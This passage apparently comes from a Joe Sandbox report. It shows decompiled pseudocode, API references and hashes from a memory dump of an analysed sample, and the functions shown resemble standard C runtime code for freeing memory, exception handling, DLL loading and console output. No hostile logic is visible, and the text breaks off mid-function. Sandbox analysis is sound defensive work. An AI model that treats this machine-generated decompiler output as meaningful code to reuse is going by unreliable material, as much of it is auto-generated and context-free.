											goto L37;
										}
										__eflags = _t244;
										if(_t244 != 0) {
											 *_t258 =  *(_t258 + _t244 * 8);
											_t258[1] =  *(_t258 + 4 + _t244 * 8);
											 *(_t258 + _t244 * 8) = _v708;
											 *(_t258 + 4 + _t244 * 8) = _t240;
										}
										goto L25;
									}
									L37:
									_t183 = _t212 * 0xc;
									_t111 = _t183 + 0x1397210; // 0x13770d1
									 *0x1394134(_t246);
									_t185 =  *((intOrPtr*)( *_t111))();
									_t232 = _v720;
									__eflags = _t185;
									if(_t185 == 0) {
										__eflags = _t232 - 0x13a3268;
										if(_t232 == 0x13a3268) {
											L44:
											_t186 = _v712;
										} else {
											_t257 = _t212 + _t212;
											__eflags = _t257;
											asm("lock xadd [eax], ecx");
											if(_t257 != 0) {
												goto L44;
											} else {
												E013871B2( *((intOrPtr*)(_t246 + 0x28 + _t257 * 8)));
												E013871B2( *((intOrPtr*)(_t246 + 0x24 + _t257 * 8)));
												E013871B2( *(_t246 + 0xa0 + _t212 * 4));
												_t186 = _v712;
												_t235 = _v704;
												 *(_t186 + _t246) = _t235;
												 *(_t246 + 0xa0 + _t212 * 4) = _t235;
											}
										}
										_t233 = _v724;
										 *_t233 = 1;
										_t164 =  *(_t186 + _t246);
										 *((intOrPtr*)(_t246 + 0x28 + (_t212 + _t212) * 8)) = _t233;
									} else {
										 *((intOrPtr*)(_v712 + _t246)) = _t232;
										E013871B2( *(_t246 + 0xa0 + _t212 * 4));
										 *(_t246 + 0xa0 + _t212 * 4) = _v740;
										E013871B2(_v724);
										 *(_t246 + 8) = _v744;
										goto L39;
									}
									goto L40;
								}
							}
						} else {
							_t164 = _t244;
							L40:
							_pop(_t247);
							_pop(_t250);
							_pop(_t213);
							return E01377F14(_t164, _t213, _v8 ^ _t260, _t244, _t247, _t250);
						}
						goto L51;
					}
					asm("sbb eax, eax");
					_t167 = _t166 | 0x00000001;
					__eflags = _t167;
					goto L8;
				}
				L51:
			}

0x0138435d
0x01384368
0x0138436f
0x01384372
0x01384373
0x01384376
0x0138437a
0x0138437b
0x0138437e
0x0138438e
0x013843b1
0x013843b6
0x013843bb
0x01384671
0x01384671
0x01384671
0x00000000
0x013843c1
0x013843c1
0x013843c4
0x013843c7
0x013843cd
0x013843d3
0x013843d6
0x013843d8
0x013843db
0x013843e5
0x013843eb
0x00000000
0x00000000
0x013843f1
0x0138441a
0x0138441a
0x013843f3
0x013843f3
0x013843fb
0x01384402
0x01384408
0x00000000
0x0138440a
0x0138440a
0x0138440d
0x01384418
0x00000000
0x00000000
0x00000000
0x00000000
0x01384418
0x01384408
0x01384427
0x01384429
0x01384432
0x01384438
0x0138443b
0x0138443b
0x0138443e
0x01384441
0x01384441
0x01384451
0x0138445f
0x01384464
0x0138446b
0x0138446d
0x00000000
0x01384473
0x01384479
0x01384486
0x0138448f
0x01384495
0x013844a2
0x013844a9
0x013844ae
0x013844b1
0x013844b3
0x013846f1
0x013846f7
0x013846f8
0x013846f9
0x013846fa
0x013846fb
0x013846fc
0x01384701
0x01384704
0x01384707
0x01384708
0x0138471a
0x0138471f
0x01384721
0x0138472a
0x00000000
0x0138472a
0x01384723
0x01384726
0x01384728
0x00000000
0x00000000
0x01384730
0x013844b9
0x013844b9
0x013844c7
0x013844ca
0x013844e0
0x013844e7
0x013844ec
0x013844cc
0x013844cc
0x013844d4
0x00000000
0x013844d6
0x013844d6
0x013844dc
0x013844dc
0x013844d4
0x013844f3
0x013844fa
0x013844fd
0x013845fb
0x013845fe
0x0138460b
0x0138460e
0x01384616
0x01384616
0x01384600
0x01384606
0x01384606
0x01384503
0x01384503
0x0138450f
0x01384515
0x0138451b
0x0138451e
0x01384524
0x01384527
0x0138452a
0x00000000
0x00000000
0x0138452c
0x01384535
0x01384539
0x01384542
0x01384546
0x01384547
0x0138454d
0x01384553
0x01384559
0x0138455c
0x00000000
0x00000000
0x0138455e
0x0138457d
0x0138457d
0x01384580
0x0138459d
0x013845a2
0x013845a5
0x013845a7
0x013845e5
0x013845a9
0x013845a9
0x013845af
0x013845b4
0x013845bc
0x013845bd
0x013845bd
0x013845d4
0x013845db
0x013845de
0x013845e0
0x013845e0
0x013845eb
0x013845f1
0x013845f1
0x013845f6
0x00000000
0x013845f6
0x01384560
0x01384562
0x01384567
0x0138456d
0x01384576
0x01384579
0x01384579
0x00000000
0x01384562
0x01384619
0x01384619
0x0138461d
0x01384625
0x0138462b
0x0138462e
0x01384634
0x01384636
0x01384682
0x01384688
0x013846d4
0x013846d4
0x0138468a
0x0138468f
0x0138468f
0x01384695
0x01384699
0x00000000
0x0138469b
0x0138469f
0x013846a8
0x013846b4
0x013846b9
0x013846c2
0x013846c8
0x013846cb
0x013846cb
0x01384699
0x013846da
0x013846e2
0x013846e8
0x013846eb
0x01384638
0x0138463e
0x01384648
0x0138465a
0x01384661
0x0138466e
0x00000000
0x0138466e
0x00000000
0x01384636
0x013844b3
0x0138442b
0x0138442b
0x01384673
0x01384676
0x01384677
0x0138467a
0x01384681
0x01384681
0x00000000
0x01384429
0x01384422
0x01384424
0x01384424
0x00000000
0x01384424
0x00000000

APIs

Part of subcall function 01385D71: GetLastError.KERNEL32(?,00000000,?,0137D1A2,00000000,00000000,?,?,01388943,00000000,00000000,00000000,00000000,?), ref: 01385D76
Part of subcall function 01385D71: SetLastError.KERNEL32(00000000,00000002,000000FF,?,01388943,00000000,00000000,00000000,00000000,?), ref: 01385E14

_free.LIBCMT ref: 01384648
_free.LIBCMT ref: 01384661
_free.LIBCMT ref: 0138469F
_free.LIBCMT ref: 013846A8
_free.LIBCMT ref: 013846B4

Strings

C, xrefs: 013844B9

Memory Dump Source

Source File: 00000002.00000002.281026800.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true

Associated: 00000002.00000002.280939181.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281545635.0000000001394000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281900158.00000000013A3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.284995880.00000000014A4000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285035285.00000000014A5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285069288.00000000014A7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1370000_321.jbxd

Similarity

API ID: _free$ErrorLast
String ID: C
API String ID: 3291180501-1037565863
Opcode ID: 3b8b3284d89b09c742ab2ef98d2e3f52192ee75e425bb25d38d0912a51029daa
Instruction ID: d496f28ec053e781bb1421dc33ec8a8b2e3cb78931ae0c45d22f5544bc64feca
Opcode Fuzzy Hash: 3b8b3284d89b09c742ab2ef98d2e3f52192ee75e425bb25d38d0912a51029daa
Instruction Fuzzy Hash: 16B1697590131ADBDB24EF18C884BADB7B5FF48318F5045AAD949A7B50E730AE90CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0137B040 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E0137B040(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _t52;
				signed int _t59;
				intOrPtr _t60;
				void* _t61;
				intOrPtr* _t62;
				intOrPtr _t64;
				intOrPtr _t66;
				intOrPtr _t67;
				intOrPtr _t72;
				intOrPtr* _t76;
				intOrPtr _t77;
				signed int _t81;
				char _t83;
				intOrPtr _t86;
				intOrPtr _t93;
				intOrPtr _t96;
				intOrPtr* _t98;
				void* _t102;
				void* _t104;
				void* _t111;

				_t89 = __edx;
				_t76 = _a4;
				_push(__edi);
				_v5 = 0;
				_v16 = 1;
				 *_t76 = E013935BB(__ecx,  *_t76);
				_t77 = _a8;
				_t6 = _t77 + 0x10; // 0x11
				_t96 = _t6;
				_push(_t96);
				_v20 = _t96;
				_v12 =  *(_t77 + 8) ^  *0x13a3014;
				E0137B000(_t77, __edx, __edi, _t96,  *(_t77 + 8) ^  *0x13a3014);
				E0137C0DC(_a12);
				_t52 = _a4;
				_t104 = _t102 - 0x1c + 0x10;
				_t93 =  *((intOrPtr*)(_t77 + 0xc));
				if(( *(_t52 + 4) & 0x00000066) != 0) {
					__eflags = _t93 - 0xfffffffe;
					if(_t93 != 0xfffffffe) {
						_t89 = 0xfffffffe;
						E0137C260(_t77, 0xfffffffe, _t96, 0x13a3014);
						goto L13;
					}
					goto L14;
				} else {
					_v32 = _t52;
					_v28 = _a12;
					 *((intOrPtr*)(_t77 - 4)) =  &_v32;
					if(_t93 == 0xfffffffe) {
						L14:
						return _v16;
					} else {
						do {
							_t81 = _v12;
							_t59 = _t93 + (_t93 + 2) * 2;
							_t77 =  *((intOrPtr*)(_t81 + _t59 * 4));
							_t60 = _t81 + _t59 * 4;
							_t82 =  *((intOrPtr*)(_t60 + 4));
							_v24 = _t60;
							if( *((intOrPtr*)(_t60 + 4)) == 0) {
								_t83 = _v5;
								goto L7;
							} else {
								_t89 = _t96;
								_t61 = E0137C200(_t82, _t96);
								_t83 = 1;
								_v5 = 1;
								_t111 = _t61;
								if(_t111 < 0) {
									_v16 = 0;
									L13:
									_push(_t96);
									E0137B000(_t77, _t89, _t93, _t96, _v12);
									goto L14;
								} else {
									if(_t111 > 0) {
										_t62 = _a4;
										__eflags =  *_t62 - 0xe06d7363;
										if( *_t62 == 0xe06d7363) {
											__eflags =  *0x13950ec;
											if(__eflags != 0) {
												_t72 = E01393150(__eflags, 0x13950ec);
												_t104 = _t104 + 4;
												__eflags = _t72;
												if(_t72 != 0) {
													_t98 =  *0x13950ec; // 0x13797c3
													 *0x1394134(_a4, 1);
													 *_t98();
													_t96 = _v20;
													_t104 = _t104 + 8;
												}
												_t62 = _a4;
											}
										}
										_t90 = _t62;
										E0137C240(_t62, _a8, _t62);
										_t64 = _a8;
										__eflags =  *((intOrPtr*)(_t64 + 0xc)) - _t93;
										if( *((intOrPtr*)(_t64 + 0xc)) != _t93) {
											_t90 = _t93;
											E0137C260(_t64, _t93, _t96, 0x13a3014);
											_t64 = _a8;
										}
										_push(_t96);
										 *((intOrPtr*)(_t64 + 0xc)) = _t77;
										E0137B000(_t77, _t90, _t93, _t96, _v12);
										_t86 =  *((intOrPtr*)(_v24 + 8));
										E0137C220();
										asm("int3");
										_t66 = E0137C277();
										__eflags = _t66;
										if(_t66 != 0) {
											_t67 = E0137B303(_t86);
											__eflags = _t67;
											if(_t67 != 0) {
												return 1;
											} else {
												E0137C2B3();
												goto L24;
											}
										} else {
											L24:
											__eflags = 0;
											return 0;
										}
									} else {
										goto L7;
									}
								}
							}
							goto L28;
							L7:
							_t93 = _t77;
						} while (_t77 != 0xfffffffe);
						if(_t83 != 0) {
							goto L13;
						}
						goto L14;
					}
				}
				L28:
			}

0x0137b040
0x0137b047
0x0137b04b
0x0137b04c
0x0137b052
0x0137b05e
0x0137b060
0x0137b066
0x0137b066
0x0137b06f
0x0137b071
0x0137b074
0x0137b077
0x0137b07f
0x0137b084
0x0137b087
0x0137b08a
0x0137b091
0x0137b0ed
0x0137b0f0
0x0137b0f8
0x0137b0ff
0x00000000
0x0137b0ff
0x00000000
0x0137b093
0x0137b093
0x0137b099
0x0137b09f
0x0137b0a5
0x0137b110
0x0137b119
0x0137b0a7
0x0137b0a7
0x0137b0a7
0x0137b0ad
0x0137b0b0
0x0137b0b3
0x0137b0b6
0x0137b0b9
0x0137b0be
0x0137b0d4
0x00000000
0x0137b0c0
0x0137b0c0
0x0137b0c2
0x0137b0c7
0x0137b0c9
0x0137b0cc
0x0137b0ce
0x0137b0e4
0x0137b104
0x0137b104
0x0137b108
0x00000000
0x0137b0d0
0x0137b0d0
0x0137b11a
0x0137b11d
0x0137b123
0x0137b125
0x0137b12c
0x0137b133
0x0137b138
0x0137b13b
0x0137b13d
0x0137b13f
0x0137b14c
0x0137b152
0x0137b154
0x0137b157
0x0137b157
0x0137b15a
0x0137b15a
0x0137b12c
0x0137b160
0x0137b162
0x0137b167
0x0137b16a
0x0137b16d
0x0137b175
0x0137b179
0x0137b17e
0x0137b17e
0x0137b181
0x0137b185
0x0137b188
0x0137b195
0x0137b198
0x0137b19d
0x0137b19e
0x0137b1a3
0x0137b1a5
0x0137b1aa
0x0137b1af
0x0137b1b1
0x0137b1bc
0x0137b1b3
0x0137b1b3
0x00000000
0x0137b1b3
0x0137b1a7
0x0137b1a7
0x0137b1a7
0x0137b1a9
0x0137b1a9
0x0137b0d2
0x00000000
0x0137b0d2
0x0137b0d0
0x0137b0ce
0x00000000
0x0137b0d7
0x0137b0d7
0x0137b0d9
0x0137b0e0
0x00000000
0x0137b0e2
0x00000000
0x0137b0e0
0x0137b0a5
0x00000000

APIs

_ValidateLocalCookies.LIBCMT ref: 0137B077
___except_validate_context_record.LIBVCRUNTIME ref: 0137B07F
_ValidateLocalCookies.LIBCMT ref: 0137B108
__IsNonwritableInCurrentImage.LIBCMT ref: 0137B133
_ValidateLocalCookies.LIBCMT ref: 0137B188

Strings

csm, xrefs: 0137B11D

Memory Dump Source

Source File: 00000002.00000002.281026800.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true

Associated: 00000002.00000002.280939181.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281545635.0000000001394000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281900158.00000000013A3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.284995880.00000000014A4000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285035285.00000000014A5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285069288.00000000014A7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1370000_321.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 9ae5e2f0c2bb442301f1a51ba77cd61b1f57e51f1a7125e1291647f2622bff56
Instruction ID: b68651c88ef7ab67de1eabaaa7702f5a2c4f0e6363cc2790c94eae382769bbd3
Opcode Fuzzy Hash: 9ae5e2f0c2bb442301f1a51ba77cd61b1f57e51f1a7125e1291647f2622bff56
Instruction Fuzzy Hash: B441B130A0020D9BCF21DF6CC884A9EFFB4FF05318F148055E929AB355D73A9A05CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01388153 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E01388153(void* __ecx, signed int* _a4, intOrPtr _a8) {
				signed int* _v8;
				void** _t12;
				void* _t16;
				void* _t18;
				signed int _t22;
				WCHAR* _t23;
				void** _t26;
				signed int* _t29;
				void* _t32;
				void* _t34;

				_t29 = _a4;
				while(_t29 != _a8) {
					_t22 =  *_t29;
					_t12 = 0x14a5d38 + _t22 * 4;
					_t32 =  *_t12;
					_v8 = _t12;
					if(_t32 == 0) {
						_t23 =  *(0x1397c10 + _t22 * 4);
						_t32 = LoadLibraryExW(_t23, 0, 0x800);
						if(_t32 != 0) {
							L12:
							_t26 = _v8;
							 *_t26 = _t32;
							if( *_t26 != 0) {
								FreeLibrary(_t32);
							}
							L14:
							if(_t32 != 0) {
								_t16 = _t32;
								L18:
								return _t16;
							}
							L15:
							_t29 =  &(_t29[1]);
							continue;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L9:
							_t32 = 0;
							L10:
							if(_t32 != 0) {
								goto L12;
							}
							 *_v8 = _t18 | 0xffffffff;
							goto L15;
						}
						_t18 = E01385868(_t23, L"api-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = E01385868(_t23, L"ext-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = LoadLibraryExW(_t23, _t32, _t32);
						_t32 = _t18;
						goto L10;
					}
					if(_t32 == 0xffffffff) {
						goto L15;
					}
					goto L14;
				}
				_t16 = 0;
				goto L18;
			}

0x0138815c
0x01388206
0x01388164
0x01388166
0x0138816d
0x0138816f
0x01388175
0x01388182
0x01388197
0x0138819b
0x013881ed
0x013881ed
0x013881f2
0x013881f6
0x013881f9
0x013881f9
0x013881ff
0x01388201
0x01388216
0x01388211
0x01388215
0x01388215
0x01388203
0x01388203
0x00000000
0x01388203
0x0138819d
0x013881a6
0x013881dd
0x013881dd
0x013881df
0x013881e1
0x00000000
0x00000000
0x013881e9
0x00000000
0x013881e9
0x013881b0
0x013881b5
0x013881ba
0x00000000
0x00000000
0x013881c4
0x013881c9
0x013881ce
0x00000000
0x00000000
0x013881d3
0x013881d9
0x00000000
0x013881d9
0x0138817a
0x00000000
0x00000000
0x00000000
0x01388180
0x0138820f
0x00000000

Strings

ext-ms-, xrefs: 013881BE
api-ms-, xrefs: 013881AA

Memory Dump Source

Source File: 00000002.00000002.281026800.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true

Associated: 00000002.00000002.280939181.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281545635.0000000001394000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281900158.00000000013A3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.284995880.00000000014A4000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285035285.00000000014A5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285069288.00000000014A7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1370000_321.jbxd

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: 26d5fd64250a657545b8b567919ecfdfc9a0ba4e30508e090a01232fdf7ae3a5
Instruction ID: 22994a385cde65e8f82b35bdfef9da7373aba74145d1d69b65398beef800979a
Opcode Fuzzy Hash: 26d5fd64250a657545b8b567919ecfdfc9a0ba4e30508e090a01232fdf7ae3a5
Instruction Fuzzy Hash: B6212431A05325BBDB32AB2D9C44B1A3B9CAF007ACF540190ED06B7381DB30ED01C6E0

Uniqueness

Uniqueness Score: -1.00%

Function 0145E222 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0145DF6C: _free.LIBCMT ref: 0145DF91

_free.LIBCMT ref: 0145E270
_free.LIBCMT ref: 0145E27B
_free.LIBCMT ref: 0145E286
_free.LIBCMT ref: 0145E2DA
_free.LIBCMT ref: 0145E2E5
_free.LIBCMT ref: 0145E2F0
_free.LIBCMT ref: 0145E2FB

Memory Dump Source

Source File: 00000002.00000002.281900158.00000000013A3000.00000004.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true

Associated: 00000002.00000002.280939181.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281026800.0000000001371000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281545635.0000000001394000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.284995880.00000000014A4000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285035285.00000000014A5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285069288.00000000014A7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1370000_321.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: cc9ab97beff943d1bc6ec6fded8371873e782450edef4c98848d5a39cd7b9da5
Instruction ID: c7ec87c6430198fabb19699e4d3000db49d8e31a3ec0e2f914d10f582815eaeb
Opcode Fuzzy Hash: cc9ab97beff943d1bc6ec6fded8371873e782450edef4c98848d5a39cd7b9da5
Instruction Fuzzy Hash: 93113D72940B05AAE670B7B2CC05FDBBB9C5F78704F80081FB6D9A7872DB75A508C690

Uniqueness

Uniqueness Score: -1.00%

Function 0138E5F6 Relevance: 10.6, APIs: 7, Instructions: 65
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0138E5F6(intOrPtr _a4) {
				void* _t18;

				_t45 = _a4;
				if(_a4 != 0) {
					E0138E342(_t45, 7);
					E0138E342(_t45 + 0x1c, 7);
					E0138E342(_t45 + 0x38, 0xc);
					E0138E342(_t45 + 0x68, 0xc);
					E0138E342(_t45 + 0x98, 2);
					E013871B2( *((intOrPtr*)(_t45 + 0xa0)));
					E013871B2( *((intOrPtr*)(_t45 + 0xa4)));
					E013871B2( *((intOrPtr*)(_t45 + 0xa8)));
					E0138E342(_t45 + 0xb4, 7);
					E0138E342(_t45 + 0xd0, 7);
					E0138E342(_t45 + 0xec, 0xc);
					E0138E342(_t45 + 0x11c, 0xc);
					E0138E342(_t45 + 0x14c, 2);
					E013871B2( *((intOrPtr*)(_t45 + 0x154)));
					E013871B2( *((intOrPtr*)(_t45 + 0x158)));
					E013871B2( *((intOrPtr*)(_t45 + 0x15c)));
					return E013871B2( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}

0x0138e5fc
0x0138e601
0x0138e60a
0x0138e615
0x0138e620
0x0138e62b
0x0138e639
0x0138e644
0x0138e64f
0x0138e65a
0x0138e668
0x0138e676
0x0138e687
0x0138e695
0x0138e6a3
0x0138e6ae
0x0138e6b9
0x0138e6c4
0x00000000
0x0138e6d4
0x0138e6d9

APIs

Part of subcall function 0138E342: _free.LIBCMT ref: 0138E367

_free.LIBCMT ref: 0138E644

Part of subcall function 013871B2: HeapFree.KERNEL32(00000000,00000000,?,0138E36C,?,00000000,?,?,?,0138E60F,?,00000007,?,?,0138EB02,?), ref: 013871C8
Part of subcall function 013871B2: GetLastError.KERNEL32(?,?,0138E36C,?,00000000,?,?,?,0138E60F,?,00000007,?,?,0138EB02,?,?), ref: 013871DA

_free.LIBCMT ref: 0138E64F
_free.LIBCMT ref: 0138E65A
_free.LIBCMT ref: 0138E6AE
_free.LIBCMT ref: 0138E6B9
_free.LIBCMT ref: 0138E6C4
_free.LIBCMT ref: 0138E6CF

Memory Dump Source

Source File: 00000002.00000002.281026800.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true

Associated: 00000002.00000002.280939181.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281545635.0000000001394000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281900158.00000000013A3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.284995880.00000000014A4000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285035285.00000000014A5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285069288.00000000014A7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1370000_321.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: a9067732414abe17cf0dff08c6af52c8b8bf21cfa09375f2dd65cc90ce90c9e1
Instruction ID: ee0c171d53f0e54401bb2c99a1c4c7b9a63594f021350719f6ba32bc11cc1cc6
Opcode Fuzzy Hash: a9067732414abe17cf0dff08c6af52c8b8bf21cfa09375f2dd65cc90ce90c9e1
Instruction Fuzzy Hash: 1D119332541B05BAD530BBB4CC49FDB779E5F20708F844C24A69A76050DAB5FE854750

Uniqueness

Uniqueness Score: -1.00%

Function 01389E5F Relevance: 9.3, APIs: 6, Instructions: 317
fileCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 84%

			E01389E5F(void* __eflags, intOrPtr _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				char _v16;
				char _v23;
				char _v24;
				void _v32;
				signed int _v33;
				signed char _v40;
				signed int _v44;
				intOrPtr _v48;
				char _v51;
				void _v52;
				long _v56;
				char _v60;
				intOrPtr _v68;
				char _v72;
				struct _OVERLAPPED* _v76;
				signed char _v80;
				signed int _v84;
				signed int _v88;
				char _v92;
				intOrPtr _v96;
				long _v100;
				signed char* _v104;
				signed char* _v108;
				void* _v112;
				intOrPtr _v116;
				char _v120;
				int _v124;
				intOrPtr _v128;
				struct _OVERLAPPED* _v132;
				struct _OVERLAPPED* _v136;
				struct _OVERLAPPED* _v140;
				struct _OVERLAPPED* _v144;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t170;
				signed int _t172;
				int _t178;
				intOrPtr _t183;
				intOrPtr _t186;
				void* _t188;
				void* _t190;
				long _t193;
				void _t198;
				signed char* _t202;
				void* _t206;
				struct _OVERLAPPED* _t211;
				void* _t220;
				long _t224;
				intOrPtr _t225;
				char _t227;
				void* _t237;
				signed int _t242;
				intOrPtr _t245;
				signed int _t248;
				signed int _t249;
				signed int _t251;
				intOrPtr _t253;
				void* _t259;
				intOrPtr _t260;
				signed int _t261;
				signed char _t264;
				intOrPtr _t267;
				signed char* _t269;
				signed int _t272;
				signed int _t273;
				signed int _t277;
				signed int _t278;
				intOrPtr _t279;
				signed int _t280;
				struct _OVERLAPPED* _t282;
				struct _OVERLAPPED* _t284;
				signed int _t285;
				void* _t286;
				void* _t287;

				_t170 =  *0x13a3014; // 0x98b2b77b
				_v8 = _t170 ^ _t285;
				_t172 = _a8;
				_t264 = _t172 >> 6;
				_t242 = (_t172 & 0x0000003f) * 0x38;
				_t269 = _a12;
				_v108 = _t269;
				_v80 = _t264;
				_v112 =  *((intOrPtr*)(_t242 +  *((intOrPtr*)(0x14a5e18 + _t264 * 4)) + 0x18));
				_v44 = _t242;
				_v96 = _a16 + _t269;
				_t178 = GetConsoleOutputCP();
				_t241 = 0;
				_v124 = _t178;
				E0137D162( &_v72, _t264, 0);
				_t273 = 0;
				_v92 = 0;
				_v88 = 0;
				_v84 = 0;
				_t245 =  *((intOrPtr*)(_v68 + 8));
				_v128 = _t245;
				_v104 = _t269;
				if(_t269 >= _v96) {
					L48:
					__eflags = _v60 - _t241;
				} else {
					while(1) {
						_t248 = _v44;
						_v51 =  *_t269;
						_v76 = _t241;
						_v40 = 1;
						_t186 =  *((intOrPtr*)(0x14a5e18 + _v80 * 4));
						_v48 = _t186;
						if(_t245 != 0xfde9) {
							goto L19;
						}
						_t211 = _t241;
						_t267 = _v48 + 0x2e + _t248;
						_v116 = _t267;
						while( *((intOrPtr*)(_t267 + _t211)) != _t241) {
							_t211 =  &(_t211->Internal);
							if(_t211 < 5) {
								continue;
							}
							break;
						}
						_t264 = _v96 - _t269;
						_v40 = _t211;
						if(_t211 <= 0) {
							_t72 = ( *_t269 & 0x000000ff) + 0x13a3970; // 0x0
							_t253 =  *_t72 + 1;
							_v48 = _t253;
							__eflags = _t253 - _t264;
							if(_t253 > _t264) {
								__eflags = _t264;
								if(_t264 <= 0) {
									goto L40;
								} else {
									_t278 = _v44;
									do {
										 *((char*)( *((intOrPtr*)(0x14a5e18 + _v80 * 4)) + _t278 + _t241 + 0x2e)) =  *((intOrPtr*)(_t241 + _t269));
										_t241 =  &(_t241->Internal);
										__eflags = _t241 - _t264;
									} while (_t241 < _t264);
									goto L39;
								}
							} else {
								_v144 = _t241;
								__eflags = _t253 - 4;
								_v140 = _t241;
								_v56 = _t269;
								_v40 = (_t253 == 4) + 1;
								_t220 = E013909F7( &_v144,  &_v76,  &_v56, (_t253 == 4) + 1,  &_v144);
								_t287 = _t286 + 0x10;
								__eflags = _t220 - 0xffffffff;
								if(_t220 == 0xffffffff) {
									goto L48;
								} else {
									_t279 = _v48;
									goto L18;
								}
							}
						} else {
							_t224 =  *((char*)(( *(_t248 + _v48 + 0x2e) & 0x000000ff) + 0x13a3970)) + 1;
							_v56 = _t224;
							_t225 = _t224 - _v40;
							_v48 = _t225;
							if(_t225 > _t264) {
								__eflags = _t264;
								if(_t264 > 0) {
									_t280 = _t248;
									do {
										_t227 =  *((intOrPtr*)(_t241 + _t269));
										_t259 =  *((intOrPtr*)(0x14a5e18 + _v80 * 4)) + _t280 + _t241;
										_t241 =  &(_t241->Internal);
										 *((char*)(_t259 + _v40 + 0x2e)) = _t227;
										_t280 = _v44;
										__eflags = _t241 - _t264;
									} while (_t241 < _t264);
									L39:
									_t273 = _v88;
								}
								L40:
								_t277 = _t273 + _t264;
								__eflags = _t277;
								L41:
								__eflags = _v60;
								_v88 = _t277;
							} else {
								_t264 = _v40;
								_t282 = _t241;
								_t260 = _v116;
								do {
									 *((char*)(_t285 + _t282 - 0xc)) =  *((intOrPtr*)(_t260 + _t282));
									_t282 =  &(_t282->Internal);
								} while (_t282 < _t264);
								_t283 = _v48;
								_t261 = _v44;
								if(_v48 > 0) {
									E01378BD0( &_v16 + _t264, _t269, _t283);
									_t261 = _v44;
									_t286 = _t286 + 0xc;
									_t264 = _v40;
								}
								_t272 = _v80;
								_t284 = _t241;
								do {
									 *( *((intOrPtr*)(0x14a5e18 + _t272 * 4)) + _t261 + _t284 + 0x2e) = _t241;
									_t284 =  &(_t284->Internal);
								} while (_t284 < _t264);
								_t269 = _v104;
								_t279 = _v48;
								_v120 =  &_v16;
								_v136 = _t241;
								_v132 = _t241;
								_v40 = (_v56 == 4) + 1;
